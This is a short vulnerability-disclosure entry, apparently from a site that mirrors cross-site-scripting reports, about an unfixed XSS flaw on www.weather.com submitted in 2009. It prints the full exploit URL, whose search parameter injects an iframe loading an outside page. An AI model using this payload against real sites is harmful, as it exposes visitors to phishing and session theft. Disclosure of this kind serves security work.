Security researcher TreX, has submitted on 22/10/2009 a cross-site-scripting (XSS) vulnerability affecting www.weather.com, which at the time of submission ranked 111 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/04/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 22/10/2009 |
Date published: 01/04/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: TreX |
Domain: www.weather.com |
Category: XSS |
Pagerank: 111 |
URL: http://www.weather.com/search/enhanced?what=Weather36HourBusinessTravelerCommand&config=SZ=160x600*W X=FHW*LNK=SSNL*UNT=F*BGI=winter*MAP=null|null*DN=www.webhackdesigns.com*TIER=0*PID=1054060864*MD5=da 536c3570c12825843d811c6ea7cd31&par=WOWs0_1054060864&site=160x600&cm_ven=WOWs0&cm_cat=160x600&code=li nk&promo=searchbox&cm_ite=link&cm_pla=searchbox&where='%22%3E%3Ciframe%20src=http://thehacking.org/% 3E |
Click here to view the mirror
|
|
|